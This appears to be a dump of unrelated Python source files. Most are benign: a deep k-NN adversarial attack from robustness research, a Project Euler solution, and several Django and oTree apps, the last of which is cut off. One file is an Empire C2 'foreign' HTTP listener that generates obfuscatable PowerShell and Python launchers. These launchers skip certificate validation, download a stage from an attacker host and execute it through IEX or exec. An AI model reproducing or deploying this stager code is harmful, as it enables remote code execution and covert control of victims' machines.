content
stringlengths
0
894k
type
stringclasses
2 values
import logging import numpy as np import torch import torch.optim as optim INFTY = 1e20 class DKNN_PGD(object): """ Implement gradient-based attack on DkNN with L-inf norm constraint. The loss function is the same as the L-2 attack, but it uses PGD as an optimizer. """ def __init__(self, dknn): self.dknn = dknn self.device = dknn.device self.layers = dknn.layers self.guide_reps = {} self.thres = None self.coeff = None def __call__(self, x_orig, label, guide_layer, m, epsilon=0.1, max_epsilon=0.3, max_iterations=1000, num_restart=1, rand_start=True, thres_steps=100, check_adv_steps=100, verbose=True): # make sure we run at least once if num_restart < 1: num_restart = 1 # if not using randomized start, no point in doing more than one start if not rand_start: num_restart = 1 label = label.cpu().numpy() batch_size = x_orig.size(0) min_, max_ = x_orig.min(), x_orig.max() # initialize adv to the original x_adv = x_orig.detach() best_num_nn = np.zeros((batch_size, )) # set coefficient of guide samples self.coeff = torch.zeros((x_orig.size(0), m)) self.coeff[:, :m // 2] += 1 self.coeff[:, m // 2:] -= 1 for i in range(num_restart): # initialize perturbation delta = torch.zeros_like(x_adv) if rand_start: delta.uniform_(- max_epsilon, max_epsilon) delta.requires_grad_() for iteration in range(max_iterations): x = torch.clamp(x_orig + delta, min_, max_) # adaptively choose threshold and guide samples every # <thres_steps> iterations with torch.no_grad(): if iteration % thres_steps == 0: thres = self.dknn.get_neighbors(x)[0][0][:, -1] self.thres = torch.tensor(thres).to(self.device).view( batch_size, 1) self.find_guide_samples( x, label, m=m, layer=guide_layer) reps = self.dknn.get_activations(x, requires_grad=True) loss = self.loss_function(reps) loss.backward() # perform update on delta with torch.no_grad(): delta -= epsilon * delta.grad.detach().sign() delta.clamp_(- max_epsilon, max_epsilon) if (verbose and iteration % (np.ceil(max_iterations / 10)) == 0): print(' step: %d; loss: %.3f' % (iteration, loss.cpu().detach().numpy())) if ((iteration + 1) % check_adv_steps == 0 or iteration == max_iterations): with torch.no_grad(): # check if x are adversarial. Only store adversarial # examples if they have a larger number of wrong # neighbors than orevious is_adv, num_nn = self.check_adv(x, label) for j in range(batch_size): if is_adv[j] and num_nn[j] > best_num_nn[j]: x_adv[j] = x[j] best_num_nn[j] = num_nn[j] with torch.no_grad(): is_adv, _ = self.check_adv(x_adv, label) if verbose: print('number of successful adv: %d/%d' % (is_adv.sum(), batch_size)) return x_adv def check_adv(self, x, label): """Check if label of <x> predicted by <dknn> matches with <label>""" output = self.dknn.classify(x) num_nn = output.max(1) y_pred = output.argmax(1) is_adv = (y_pred != label).astype(np.float32) return is_adv, num_nn def loss_function(self, reps): """Returns the loss averaged over the batch (first dimension of x) and L-2 norm squared of the perturbation """ batch_size = reps[self.layers[0]].size(0) adv_loss = torch.zeros( (batch_size, len(self.layers)), device=self.device) # find squared L-2 distance between original samples and their # adversarial examples at each layer for l, layer in enumerate(self.layers): rep = reps[layer].view(batch_size, 1, -1) dist = ((rep - self.guide_reps[layer])**2).sum(2) fx = self.thres - dist Fx = torch.max(torch.tensor(0., device=self.device), self.coeff.to(self.device) * fx).sum(1) adv_loss[:, l] = Fx return adv_loss.mean() def find_guide_samples(self, x, label, m=100, layer='relu1'): """Find k nearest neighbors to <x> that all have the same class but not equal to <label> """ num_classes = self.dknn.num_classes x_train = self.dknn.x_train y_train = self.dknn.y_train batch_size = x.size(0) nn = torch.zeros((m, ) + x.size()).transpose(0, 1) D, I = self.dknn.get_neighbors( x, k=x_train.size(0), layers=[layer])[0] for i, (d, ind) in enumerate(zip(D, I)): mean_dist = np.zeros((num_classes, )) for j in range(num_classes): mean_dist[j] = np.mean( d[np.where(y_train[ind] == j)[0]][:m // 2]) mean_dist[label[i]] += INFTY nearest_label = mean_dist.argmin() nn_ind = np.where(y_train[ind] == nearest_label)[0][:m // 2] nn[i, m // 2:] = x_train[ind[nn_ind]] nn_ind = np.where(y_train[ind] == label[i])[0][:m // 2] nn[i, :m // 2] = x_train[ind[nn_ind]] # initialize self.guide_reps if empty if not self.guide_reps: guide_rep = self.dknn.get_activations( nn[0], requires_grad=False) for l in self.layers: # set a zero tensor before filling it size = (batch_size, ) + guide_rep[l].view(m, -1).size() self.guide_reps[l] = torch.zeros(size, device=self.device) # fill self.guide_reps for i in range(batch_size): guide_rep = self.dknn.get_activations( nn[i], requires_grad=False) self.guide_reps[layer][i] = guide_rep[layer].view( m, -1).detach()
python
from projecteuler import util from functools import reduce from operator import mul def solution(): """ The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832. Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product? """ ans = 0 with open('../data/problem_008_data.txt') as f: n = [int(x) for x in f.read().replace('\n', '')] for i in range(len(n)): tmp = reduce(mul, n[i:i + 13]) if tmp > ans: ans = tmp return ans if __name__ == '__main__': assert str(solution()) == util.get_answer(8)
python
algo = input('Digite algo: ') print('O tipo primitivo de algo é', type(algo))
python
from __future__ import print_function import base64 import random from builtins import object, str from textwrap import dedent from typing import List from empire.server.common import helpers, packets from empire.server.utils import data_util, listener_util class Listener(object): def __init__(self, mainMenu, params=[]): self.info = { "Name": "HTTP[S]", "Author": ["@harmj0y"], "Description": ("Starts a 'foreign' http[s] Empire listener."), "Category": ("client_server"), "Comments": [], } # any options needed by the stager, settable during runtime self.options = { # format: # value_name : {description, required, default_value} "Name": { "Description": "Name for the listener.", "Required": True, "Value": "http_foreign", }, "Host": { "Description": "Hostname/IP for staging.", "Required": True, "Value": "http://%s" % (helpers.lhost()), }, "Port": { "Description": "Port for the listener.", "Required": True, "Value": "", }, "Launcher": { "Description": "Launcher string.", "Required": True, "Value": "powershell -noP -sta -w 1 -enc ", }, "StagingKey": { "Description": "Staging key for initial agent negotiation.", "Required": True, "Value": "2c103f2c4ed1e59c0b4e2e01821770fa", }, "DefaultDelay": { "Description": "Agent delay/reach back interval (in seconds).", "Required": True, "Value": 5, }, "DefaultJitter": { "Description": "Jitter in agent reachback interval (0.0-1.0).", "Required": True, "Value": 0.0, }, "DefaultLostLimit": { "Description": "Number of missed checkins before exiting", "Required": True, "Value": 60, }, "DefaultProfile": { "Description": "Default communication profile for the agent.", "Required": True, "Value": "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", }, "KillDate": { "Description": "Date for the listener to exit (MM/dd/yyyy).", "Required": False, "Value": "", }, "WorkingHours": { "Description": "Hours for the agent to operate (09:00-17:00).", "Required": False, "Value": "", }, "SlackURL": { "Description": "Your Slack Incoming Webhook URL to communicate with your Slack instance.", "Required": False, "Value": "", }, } # required: self.mainMenu = mainMenu self.threads = {} # optional/specific for this module self.app = None self.uris = [ a.strip("/") for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",") ] # set the default staging key to the controller db default self.options["StagingKey"]["Value"] = str( data_util.get_config("staging_key")[0] ) def default_response(self): """ If there's a default response expected from the server that the client needs to ignore, (i.e. a default HTTP page), put the generation here. """ return "" def validate_options(self): """ Validate all options for this listener. """ self.uris = [ a.strip("/") for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",") ] for key in self.options: if self.options[key]["Required"] and ( str(self.options[key]["Value"]).strip() == "" ): print(helpers.color('[!] Option "%s" is required.' % (key))) return False return True def generate_launcher( self, encode=True, obfuscate=False, obfuscationCommand="", userAgent="default", proxy="default", proxyCreds="default", stagerRetries="0", language=None, safeChecks="", listenerName=None, bypasses: List[str] = None, ): """ Generate a basic launcher for the specified listener. """ bypasses = [] if bypasses is None else bypasses if not language: print( helpers.color( "[!] listeners/http_foreign generate_launcher(): no language specified!" ) ) if listenerName and (listenerName in self.mainMenu.listeners.activeListeners): # extract the set options for this instantiated listener listenerOptions = self.mainMenu.listeners.activeListeners[listenerName][ "options" ] host = listenerOptions["Host"]["Value"] launcher = listenerOptions["Launcher"]["Value"] stagingKey = listenerOptions["StagingKey"]["Value"] profile = listenerOptions["DefaultProfile"]["Value"] uris = [a for a in profile.split("|")[0].split(",")] stage0 = random.choice(uris) customHeaders = profile.split("|")[2:] if language.startswith("po"): # PowerShell stager = '$ErrorActionPreference = "SilentlyContinue";' if safeChecks.lower() == "true": stager = "If($PSVersionTable.PSVersion.Major -ge 3){" for bypass in bypasses: stager += bypass stager += "};[System.Net.ServicePointManager]::Expect100Continue=0;" stager += "$wc=New-Object System.Net.WebClient;" if userAgent.lower() == "default": profile = listenerOptions["DefaultProfile"]["Value"] userAgent = profile.split("|")[1] stager += f"$u='{ userAgent }';" if "https" in host: # allow for self-signed certificates for https connections stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" if userAgent.lower() != "none" or proxy.lower() != "none": if userAgent.lower() != "none": stager += "$wc.Headers.Add('User-Agent',$u);" if proxy.lower() != "none": if proxy.lower() == "default": stager += ( "$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;" ) else: # TODO: implement form for other proxy stager += "$proxy=New-Object Net.WebProxy;" stager += f"$proxy.Address = '{ proxy.lower() }';" stager += "$wc.Proxy = $proxy;" if proxyCreds.lower() == "default": stager += "$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;" else: # TODO: implement form for other proxy credentials username = proxyCreds.split(":")[0] password = proxyCreds.split(":")[1] domain = username.split("\\")[0] usr = username.split("\\")[1] stager += f"$netcred = New-Object System.Net.NetworkCredential('{ usr }', '{ password }', '{ domain }');" stager += f"$wc.Proxy.Credentials = $netcred;" # TODO: reimplement stager retries? # Add custom headers if any if customHeaders != []: for header in customHeaders: headerKey = header.split(":")[0] headerValue = header.split(":")[1] stager += f'$wc.Headers.Add("{ headerKey }","{ headerValue }");' # code to turn the key string into a byte array stager += ( f"$K=[System.Text.Encoding]::ASCII.GetBytes('{ stagingKey }');" ) # this is the minimized RC4 stager code from rc4.ps1 stager += listener_util.powershell_rc4() # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet( stagingKey, sessionID="00000000", language="POWERSHELL", meta="STAGE0", additional="None", encData="", ) b64RoutingPacket = base64.b64encode(routingPacket) # add the RC4 packet to a cookie stager += f'$wc.Headers.Add("Cookie","session={ b64RoutingPacket.decode("UTF-8") }");' stager += f"$ser= { helpers.obfuscate_call_home_address(host) };$t='{ stage0 }';" stager += "$data=$wc.DownloadData($ser+$t);" stager += "$iv=$data[0..3];$data=$data[4..$data.length];" # decode everything and kick it over to IEX to kick off execution stager += "-join[Char[]](& $R $data ($IV+$K))|IEX" # Remove comments and make one line stager = helpers.strip_powershell_comments(stager) stager = data_util.ps_convert_to_oneliner(stager) if obfuscate: stager = data_util.obfuscate( self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand, ) # base64 encode the stager and return it if encode and ( (not obfuscate) or ("launcher" not in obfuscationCommand.lower()) ): return helpers.powershell_launcher(stager, launcher) else: # otherwise return the case-randomized stager return stager if language.startswith("py"): # Python launcherBase = "import sys;" if "https" in host: # monkey patch ssl woohooo launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n" try: if safeChecks.lower() == "true": launcherBase += listener_util.python_safe_checks() except Exception as e: p = "[!] Error setting LittleSnitch in stagger: " + str(e) print(helpers.color(p, color="red")) if userAgent.lower() == "default": profile = listenerOptions["DefaultProfile"]["Value"] userAgent = profile.split("|")[1] launcherBase += dedent( f""" o=__import__({{2:'urllib2',3:'urllib.request'}}[sys.version_info[0]],fromlist=['build_opener']).build_opener(); UA='{userAgent}'; server='{host}';t='{stage0}'; """ ) # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet( stagingKey, sessionID="00000000", language="POWERSHELL", meta="STAGE0", additional="None", encData="", ) b64RoutingPacket = base64.b64encode(routingPacket).decode("UTF-8") # add the RC4 packet to a cookie launcherBase += ( 'o.addheaders=[(\'User-Agent\',UA), ("Cookie", "session=%s")];\n' % (b64RoutingPacket) ) launcherBase += "import urllib.request;\n" if proxy.lower() != "none": if proxy.lower() == "default": launcherBase += "proxy = urllib.request.ProxyHandler();\n" else: proto = proxy.Split(":")[0] launcherBase += ( "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n" ) if proxyCreds != "none": if proxyCreds == "default": launcherBase += "o = urllib.request.build_opener(proxy);\n" else: launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n" username = proxyCreds.split(":")[0] password = proxyCreds.split(":")[1] launcherBase += ( "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n" ) launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib.request.build_opener(proxy);\n" else: launcherBase += "o = urllib.request.build_opener();\n" # install proxy and creds globally, so they can be used with urlopen. launcherBase += "urllib.request.install_opener(o);\n" launcherBase += "a=o.open(server+t).read();\n" # download the stager and extract the IV launcherBase += listener_util.python_extract_stager(stagingKey) if encode: launchEncoded = base64.b64encode( launcherBase.encode("UTF-8") ).decode("UTF-8") if isinstance(launchEncoded, bytes): launchEncoded = launchEncoded.decode("UTF-8") launcher = ( "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &" % (launchEncoded) ) return launcher else: return launcherBase else: print( helpers.color( "[!] listeners/http_foreign generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module." ) ) else: print( helpers.color( "[!] listeners/http_foreign generate_launcher(): invalid listener name specification!" ) ) def generate_stager( self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None, ): """ If you want to support staging for the listener module, generate_stager must be implemented to return the stage1 key-negotiation stager code. """ print( helpers.color( "[!] generate_stager() not implemented for listeners/template" ) ) return "" def generate_agent( self, listenerOptions, language=None, obfuscate=False, obfuscationCommand="" ): """ If you want to support staging for the listener module, generate_agent must be implemented to return the actual staged agent code. """ print( helpers.color("[!] generate_agent() not implemented for listeners/template") ) return "" def generate_comms(self, listenerOptions, language=None): """ Generate just the agent communication code block needed for communications with this listener. This is so agents can easily be dynamically updated for the new listener. """ if language: if language.lower() == "powershell": updateServers = """ $Script:ControlServers = @("%s"); $Script:ServerIndex = 0; """ % ( listenerOptions["Host"]["Value"] ) getTask = """ $script:GetTask = { try { if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) { # meta 'TASKING_REQUEST' : 4 $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4 $RoutingCookie = [Convert]::ToBase64String($RoutingPacket) # build the web request object $wc= New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; $wc.Headers.Add("User-Agent",$script:UserAgent) $script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)} $wc.Headers.Add("Cookie", "session=$RoutingCookie") # choose a random valid URI for checkin $taskURI = $script:TaskURIs | Get-Random $result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI) $result } } catch [Net.WebException] { $script:MissedCheckins += 1 if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } """ sendMessage = listener_util.powershell_send_message() return updateServers + getTask + sendMessage elif language.lower() == "python": updateServers = "server = '%s'\n" % (listenerOptions["Host"]["Value"]) # Import sockschain code f = open( self.mainMenu.installPath + "/data/agent/stagers/common/sockschain.py" ) socks_import = f.read() f.close() sendMessage = listener_util.python_send_message(self.session_cookie) return socks_import + updateServers + sendMessage else: print( helpers.color( "[!] listeners/http_foreign generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module." ) ) else: print( helpers.color( "[!] listeners/http_foreign generate_comms(): no language specified!" ) ) def start(self, name=""): """ Nothing to actually start for a foreign listner. """ return True def shutdown(self, name=""): """ Nothing to actually shut down for a foreign listner. """ pass
python
from blackpearl.modules import Module from blackpearl.modules import Timer from blackpearl.projects import Project class MyTimer(Timer): tick = 0.1 def setup(self): self.start() class Listener(Module): listening_for = ['timer'] def receive(self, message): print(message['timer']['time']) class MyProject(Project): modules_required = [MyTimer, Listener,] if __name__ == '__main__': MyProject()
python
from otree.api import * c = Currency doc = """ Your app description """ class Constants(BaseConstants): name_in_url = 'payment_info' players_per_group = None num_rounds = 1 class Subsession(BaseSubsession): pass class Group(BaseGroup): pass class Player(BasePlayer): pass # PAGES class PaymentInfo(Page): pass page_sequence = [PaymentInfo]
python
from src.grid.electrical_vehicle import EV from collections import defaultdict from typing import List import numpy as np class Scenario: def __init__(self, load_inds: list, timesteps_hr: np.ndarray, evs: List[EV], power_price: np.ndarray, ): """ Scenario aggregates information about EVs and power price . load_inds -- indicis of the load nodes in the grid timesteps_hr -- array of the timesteps evs -- list of the EVs power_price -- array specifying power price. Should have the same shape as timesteps_hr """ self.load_inds = load_inds self.n_loads = len(load_inds) self.power_price = power_price self._setup_times(timesteps_hr) self._setup_evs(evs) assert power_price.shape == self.timesteps_hr.shape, 'Timesteps and power price shapes must be equal' def _setup_times(self, timesteps_hr): self.timesteps_hr = timesteps_hr self.t_start_hr = timesteps_hr[0] self.t_start_ind = 0 self.t_end_hr = timesteps_hr[-1] self.n_timesteps = len(self.timesteps_hr) self.t_end_ind = self.n_timesteps - 1 self.ptu_size_hr = timesteps_hr[1] - timesteps_hr[0] self.ptu_size_minutes = int(60 * self.ptu_size_hr) def _setup_evs(self, evs): self.evs = evs self.load_evs_presence = {load_ind: defaultdict(list) for load_ind in self.load_inds} self.ev_status = defaultdict(dict) self.t_ind_arrivals = defaultdict(list) self.t_ind_departures = defaultdict(list) self.t_ind_charging_evs = defaultdict(list) self.load_ind_business = {load_ind: np.zeros(self.n_timesteps) for load_ind in self.load_inds} for ev in evs: # ev.utility_coef /= self.norm_factor t_arr_ind = int(ev.t_arr_hr / self.ptu_size_hr) t_dep_ind = int(ev.t_dep_hr / self.ptu_size_hr) assert t_arr_ind == ev.t_arr_hr / self.ptu_size_hr and t_dep_ind == ev.t_dep_hr / self.ptu_size_hr, \ 'EVs arrival and departure times should be rounded to PTU size !' self.load_ind_business[ev.load_ind][t_arr_ind: t_dep_ind] = True for t_ind in range(self.timesteps_hr.shape[0]): if t_ind < t_arr_ind: self.ev_status[ev][t_ind] = 'inactive' elif t_ind == t_arr_ind: self.ev_status[ev][t_ind] = 'arrive' self.t_ind_arrivals[t_ind].append(ev) self.load_evs_presence[ev.load_ind][t_ind].append(ev) elif t_arr_ind < t_ind < t_dep_ind: self.ev_status[ev][t_ind] = 'active' self.t_ind_charging_evs[t_ind].append(ev) self.load_evs_presence[ev.load_ind][t_ind].append(ev) elif t_ind == t_dep_ind: self.ev_status[ev][t_ind] = 'depart' self.t_ind_departures[t_ind].append(ev) self.load_evs_presence[ev.load_ind][t_ind].append(ev) elif t_ind > t_dep_ind: self.ev_status[ev][t_ind] = 'inactive' def get_evs_known_at_t_ind(self, t_ind: int) -> List[EV]: evs_known_at_t_ind = [ev for ev in self.evs if int(ev.t_arr_hr / self.ptu_size_hr) <= t_ind] return evs_known_at_t_ind def create_scenario_unknown_future(self, t_ind): evs_known_at_t_ind = self.get_evs_known_at_t_ind(t_ind) return Scenario(self.load_inds, self.timesteps_hr, evs_known_at_t_ind, self.power_price)
python
from django.shortcuts import render, redirect from django.http import HttpResponse import django.contrib.auth as auth from django.contrib.auth.decorators import login_required from django.contrib.auth.models import User from apps import EftConfig from . import models as etf_models import json from parser import parse_by_symbol def index(request): return render(request, 'index.html', {}) def signup_view(request): return render(request, 'signup.html', {}) def login(request): if 'POST' != request.method: return render(request, 'message.html', {'message': 'login failed1'}, status=400) if 'username' not in request.POST or 'password' not in request.POST: return render(request, 'message.html', {'message': 'login failed2'}, status=400) username = request.POST['username'] password = request.POST['password'] # TODO more careful username and password validation if username == '' or password == '': return render(request, 'message.html', {'message': 'login failed3'}, status=400) # validation user = auth.authenticate(username=username, password=password) if None == user: return render(request, 'message.html', {'message': 'login failed4'}, status=400) # login auth.login(request, user) # then redirect return redirect('search') def signup(request): if 'POST' != request.method: return render(request, 'message.html', {'message': 'signup failed1'}, status=400) post_data = request.POST if 'username' not in post_data or 'password' not in post_data or \ 'email' not in post_data or 'first_name' not in post_data or \ 'last_name' not in post_data: return render(request, 'message.html', {'message': 'signup failed2'}, status=400) username = post_data['username'] password = post_data['password'] email = post_data['email'] first_name = post_data['first_name'] last_name = post_data['last_name'] # TODO validate the input try: user = User.objects.create_user(username=username, password=password, email=email, first_name=first_name, last_name=last_name) user.save() except Exception as e: return render(request, 'message.html', {'message': str(e)}, status=400) return render(request, 'message.html', {'message': 'register successfully'}, status=200) def logout(request): auth.logout(request) return redirect('index') @login_required def search(request): return render(request, 'search.html') @login_required def history(request): return render(request, 'history.html') ### ajax apis ####### @login_required def _history(request): if not request.is_ajax(): return HttpResponse(json.dumps({'error': 'bad header'}), status=404, content_type='application/json') user = request.user response_data = { 'records': [], } for record in etf_models.EtfRecord.objects.filter(user_id=user.id): r = {} r['symbol'] = record.symbol r['etf_name'] = record.etf_name r['fund_description'] = record.fund_description response_data['records'].append(r) return HttpResponse(json.dumps(response_data), status=200, content_type='application/json') @login_required def _search(request): ''' data format example: {'symbol': 'DTS'} ''' user = request.user if 'GET' != request.method or not request.is_ajax(): return HttpResponse(json.dumps({'error': 'bad header'}), status=404, content_type='application/json') record = None try : # TODO validate the data, symbol = request.GET['symbol'] # getting from db if possible data = etf_models.EtfRecord.objects.filter(symbol=symbol) if (len(data) > 0): # no need to query again, it is in the db. record = data[0] except Exception as error: error_msg = { 'error': str(error), 'user_msg': 'Server encountered an error' } return HttpResponse(json.dumps(error_msg), content_type='application/json', status=400) try: if (None == record): # need to parse from the website etf_data = parse_by_symbol(symbol) # save it to db record = etf_models.EtfRecord.objects.create(user=user, symbol=etf_data['symbol'], etf_name=etf_data['etf_name'], fund_description=etf_data['fund_description']) record.save() for holding in etf_data['top_10_holdings']: h = etf_models.Holding.objects.create(record=record, name=holding['name'], weight=holding['weight'], shares=holding['shares']) h.save() for country_weight in etf_data['country_weights']: cw = etf_models.CountryWeights.objects.create(record=record, country=country_weight['country'], weight=country_weight['weight']) cw.save() for sector_weight in etf_data['sector_weights']: sw = etf_models.SectorWeights.objects.create(record=record, sector=sector_weight['sector'], weight=sector_weight['weight']) sw.save() except Exception as error: # undo possible changes to db data = etf_models.EtfRecord.objects.filter(symbol=symbol) if (len(data) > 0): record = data[0] record.delete() error_msg = { 'error': str(error), 'user_msg': 'invalid symbol' } # raise error # for debug return HttpResponse(json.dumps(error_msg), content_type='application/json', status=400) # construct response response_data = {} response_data['fund_description'] = record.fund_description response_data['etf_name'] = record.fund_description response_data['symbol'] = symbol top_10_holdings = [] for h in record.holding_set.all(): top_10_holdings.append({ 'name': h.name, 'weight': h.weight, 'shares': h.shares }) country_weights = [] for w in record.countryweights_set.all(): country_weights.append({ 'country': w.country, 'weight': w.weight }) sector_weights = [] for w in record.sectorweights_set.all(): sector_weights.append({ 'sector': w.sector, 'weight': w.weight }) response_data['top_10_holdings'] = top_10_holdings response_data['country_weights'] = country_weights response_data['sector_weights'] = sector_weights return HttpResponse(json.dumps(response_data), status=200, content_type='application/json') @login_required def download(request, table, symbol): user = request.user records = etf_models.EtfRecord.objects.filter(symbol=symbol) if len(records) < 1: return HttpResponse(status=404) record = records[0] if 'top10holdings' == table: csv_data = 'name,weight,shares\n' for holding in record.holding_set.all(): csv_data += '{0},{1},{2}\n'.format(holding.name, holding.weight, holding.shares) response = HttpResponse(csv_data) response['Content-Disposition'] = 'attachment;filename="holdings.csv"' return response elif 'countryweights' == table: csv_data = 'country,weight\n' for cw in record.countryweights_set.all(): csv_data += '{0},{1}\n'.format(cw.country, str(cw.weight)+'%') response = HttpResponse(csv_data) response['Content-Disposition'] = 'attachment;filename="country weight.csv"' return response elif 'sectorweights' == table: csv_data = 'sector,weight\n' for sw in record.sectorweights_set.all(): csv_data += '{0},{1}\n'.format(sw.sector, str(sw.weight)+'%') response = HttpResponse(csv_data) response['Content-Disposition'] = 'attachment;filename="sector weight.csv"' return response else: return HttpResponse(status=404)
python
from django.http import HttpResponse, StreamingHttpResponse from django.views.decorators.csrf import csrf_exempt from gzip import GzipFile import tarfile from io import BytesIO from datetime import datetime import json import traceback from psycopg2 import OperationalError from interface.settings import PREVIEW_LIMIT, POSTGRES_CONFIG, FIELD_DESCRIPTIONS, HEARTBEAT, BASE_DIR, LOGS_TIME_BUFFER from .postgresql_manager import PostgreSQL_Manager import threading import time from .input_validator import load_and_validate_columns, load_and_validate_constraints, load_and_validate_date, load_and_validate_order_clauses from logger_manager import LoggerManager PGM = PostgreSQL_Manager(POSTGRES_CONFIG, FIELD_DESCRIPTIONS.keys(), LOGS_TIME_BUFFER) LOGGER = LoggerManager(logger_name='opendata-interface', module_name='opendata', heartbeat_dir=HEARTBEAT['dir']) def heartbeat(): while True: try: PGM.get_min_and_max_dates() LOGGER.log_heartbeat('Scheduled heartbeat', HEARTBEAT['api_file'], 'SUCCEEDED') except OperationalError as operational_error: LOGGER.log_heartbeat('PostgreSQL error: {0}'.format(str(operational_error).replace('\n', ' ')), HEARTBEAT['api_file'], 'FAILED') except Exception as exception: LOGGER.log_heartbeat('Error: {0}'.format(str(exception).replace('\n', ' ')), HEARTBEAT['api_file'], 'FAILED') time.sleep(HEARTBEAT['interval']) heartbeat_thread = threading.Thread(target=heartbeat) heartbeat_thread.daemon = True heartbeat_thread.start() @csrf_exempt def get_daily_logs(request): try: if request.method == 'GET': request_data = request.GET else: request_data = json.loads(request.body.decode('utf8')) date = load_and_validate_date(request_data.get('date', '')) columns = load_and_validate_columns(request_data.get('columns', '[]')) constraints = load_and_validate_constraints(request_data.get('constraints', '[]')) order_clauses = load_and_validate_order_clauses(request_data.get('order-clauses', '[]')) except Exception as exception: LOGGER.log_error('api_daily_logs_query_validation_failed', 'Failed to validate daily logs query. {0} ERROR: {1}'.format( str(exception), traceback.format_exc().replace('\n', '') )) return HttpResponse(json.dumps({'error': str(exception)}), status=400) try: gzipped_file = _generate_gzipped_file(date, columns, constraints, order_clauses) response = HttpResponse(gzipped_file, content_type='application/gzip') response['Content-Disposition'] = 'attachment; filename="{0:04d}-{1:02d}-{2:02d}@{3}.tar.gz"'.format( date.year, date.month, date.day, int(datetime.now().timestamp()) ) return response except Exception as exception: LOGGER.log_error('api_daily_logs_query_failed', 'Failed retrieving daily logs. ERROR: {0}'.format( traceback.format_exc().replace('\n', '') )) return HttpResponse( json.dumps({'error': 'Server encountered error when generating gzipped tarball.'}), status=500 ) @csrf_exempt def get_preview_data(request): try: if request.method == 'GET': request_data = request.GET else: request_data = json.loads(request.body.decode('utf8')) date = load_and_validate_date(request_data.get('date', '')) columns = load_and_validate_columns(request_data.get('columns', '[]')) constraints = load_and_validate_constraints(request_data.get('constraints', '[]')) order_clauses = load_and_validate_order_clauses(request_data.get('order-clauses', '[]')) except Exception as exception: LOGGER.log_error('api_preview_data_query_validation_failed', 'Failed to validate daily preview data query. {0} ERROR: {1}'.format( str(exception), traceback.format_exc().replace('\n', '') )) return HttpResponse(json.dumps({'error': str(exception)}), status=400) try: rows, _, _ = _get_content(date, columns, constraints, order_clauses, PREVIEW_LIMIT) return_value = {'data': [[str(element) for element in row] for row in rows]} return HttpResponse(json.dumps(return_value)) except Exception as exception: LOGGER.log_error('api_preview_data_query_failed', 'Failed retrieving daily preview data. {0} ERROR: {1}'.format( str(exception), traceback.format_exc().replace('\n', '') )) return HttpResponse( json.dumps({'error': 'Server encountered error when delivering dataset sample.'}), status=500 ) @csrf_exempt def get_date_range(request): try: min_date, max_date = PGM.get_min_and_max_dates() return HttpResponse(json.dumps({'date': {'min': str(min_date), 'max': str(max_date)}})) except Exception as exception: LOGGER.log_error('api_date_range_query_failed', 'Failed retrieving date range for logs. ERROR: {0}'.format( traceback.format_exc().replace('\n', '') )) return HttpResponse( json.dumps({'error': 'Server encountered error when calculating min and max dates.'}), status=500 ) @csrf_exempt def get_column_data(request): postgres_to_python_type = {'varchar(255)': 'string', 'bigint': 'integer', 'integer': 'integer', 'date': 'date (YYYY-MM-DD)', 'boolean': 'boolean'} type_to_operators = { 'string': ['=', '!='], 'boolean': ['=', '!='], 'integer': ['=', '!=', '<', '<=', '>', '>='], 'date (YYYY-MM-DD)': ['=', '!=', '<', '<=', '>', '>='], } try: data = [] for column_name in FIELD_DESCRIPTIONS: datum = {'name': column_name} datum['description'] = FIELD_DESCRIPTIONS[column_name]['description'] datum['type'] = postgres_to_python_type[FIELD_DESCRIPTIONS[column_name]['type']] datum['valid_operators'] = type_to_operators[datum['type']] data.append(datum) return HttpResponse(json.dumps({'columns': data})) except Exception as exception: LOGGER.log_error('api_column_data_query_failed', 'Failed retrieving column data. ERROR: {0}'.format( traceback.format_exc().replace('\n', '') )) return HttpResponse( json.dumps({'error': 'Server encountered error when listing column data.'}), status=500 ) def _generate_gzipped_file(date, columns, constraints, order_clauses): rows, columns, date_columns = _get_content(date, columns, constraints, order_clauses) tarball_bytes = BytesIO() with tarfile.open(fileobj=tarball_bytes, mode='w:gz') as tarball: data_file, data_info = _generate_json_file(columns, rows, date_columns, date) meta_file, meta_info = _generate_meta_file(columns, constraints, order_clauses, date_columns) tarball.addfile(data_info, data_file) tarball.addfile(meta_info, meta_file) return tarball_bytes.getvalue() def _get_content(date, columns, constraints, order_clauses, limit=None): constraints.append({'column': 'requestInDate', 'operator': '=', 'value': date.strftime('%Y-%m-%d')}) column_names_and_types = PGM.get_column_names_and_types() if not columns: # If no columns are specified, all must be returned columns = [column_name for column_name, _ in column_names_and_types] date_columns = [column_name for column_name, column_type in column_names_and_types if column_type == 'date' and column_name in columns] rows = PGM.get_data(constraints=constraints, columns=columns, order_by=order_clauses, limit=limit) return rows, columns, date_columns 